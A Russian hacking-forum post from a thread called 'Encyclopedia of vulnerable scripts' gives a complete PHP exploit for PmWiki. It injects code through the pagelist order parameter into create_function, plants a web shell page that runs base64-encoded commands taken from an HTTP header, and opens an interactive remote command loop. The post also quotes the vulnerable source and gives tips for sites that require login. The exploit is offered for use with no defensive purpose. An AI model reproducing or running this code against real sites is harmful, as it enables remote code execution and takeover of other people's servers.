Форум АНТИЧАТ - Показать сообщение отдельно - Энциклопедия уязвимых скриптов

[B][COLOR="Yellow"]PmWiki

Exploit:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] \n"[/COLOR][COLOR="#007700"]; 

    print[/COLOR][COLOR="#DD0000"]"\nExample....: php[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]localhost /"[/COLOR][COLOR="#007700"]; 

    print[/COLOR][COLOR="#DD0000"]"\nExample....: php[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]localhost /pmwiki/\n"[/COLOR][COLOR="#007700"]; 

    die(); 

} 

  

[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]; 

[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$argv[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]]; 

  

[/COLOR][COLOR="#0000BB"]$phpcode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"']);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD]));print(___);die;#"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$payload[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"action=edit&post=save&n=Cmd.Shell&text=(:pagelist order=[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$phpcode[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]:)"[/COLOR][COLOR="#007700"]; 

  

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"POST[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]pmwiki.php HTTP/1.0\r\n"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Host:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]\r\n"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Length: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$payload[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: application/x-www-form-urlencoded\r\n"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Connection: close\r\n\r\n[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$payload[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]; 

  

if (![/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/Location/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]http_send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]))) die([/COLOR][COLOR="#DD0000"]"\n[-] Edit password required?!\n"[/COLOR][COLOR="#007700"]); 

  

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"POST[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]pmwiki.php HTTP/1.0\r\n"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Host:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]\r\n"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Cmd: %s\r\n"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Length: 11\r\n"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: application/x-www-form-urlencoded\r\n"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Connection: close\r\n\r\nn=Cmd.Shell"[/COLOR][COLOR="#007700"]; 

  

while([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) 

{ 

    print[/COLOR][COLOR="#DD0000"]"\npmwiki-shell# "[/COLOR][COLOR="#007700"]; 

    if (([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]STDIN[/COLOR][COLOR="#007700"]))) ==[/COLOR][COLOR="#DD0000"]"exit"[/COLOR][COLOR="#007700"]) break; 

[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http_send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]base64_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]))); 

[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/\n\r\n(.*)___/s"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]) ? print[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] : die([/COLOR][COLOR="#DD0000"]"\n[-] Exploit failed!\n"[/COLOR][COLOR="#007700"]); 

} 

  

[/COLOR][COLOR="#0000BB"]?>

[/COLOR][/COLOR]

Уязвимый код:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; 

foreach([/COLOR][COLOR="#0000BB"]$opt[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'=order'[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]) { 

if (@[/COLOR][COLOR="#0000BB"]$PageListSortCmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]])  

[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"\$c =[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$PageListSortCmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]; "[/COLOR][COLOR="#007700"];  

else  

[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"\$c = @strcasecmp(\$PCache[\$x]['[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#DD0000"]'],\$PCache[\$y]['[/COLOR][COLOR="#0000BB"]$o[/COLOR][COLOR="#DD0000"]']); "[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"if (\$c) return[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#DD0000"]\$c;\n"[/COLOR][COLOR="#007700"]; 

} 

[/COLOR][COLOR="#0000BB"]StopWatch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PageListSort sort'[/COLOR][COLOR="#007700"]); 

if ([/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"])  

[/COLOR][COLOR="#0000BB"]uasort[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$list[/COLOR][COLOR="#007700"], 

[/COLOR][COLOR="#0000BB"]create_function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'$x,$y'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"global \$PCache;[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#DD0000"]return 0;"[/COLOR][COLOR="#007700"])); 

[/COLOR][COLOR="#0000BB"]StopWatch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PageListSort end'[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR]

P.S. Без авторизации проходит только на нескольких сайтах, а в остальных нужно авторизоватся и добавить в пакет ваш User-Agent и Cookie. Т.е.

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"User-Agent: bla-bla\r\n"[/COLOR][COLOR="#007700"]; 

[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Cookie: blabla=6gui67gg7t76rf7iiiirvr76r67v\r\n"[/COLOR][COLOR="#007700"]; 

[/COLOR][/COLOR]

Кто допер, тот допер...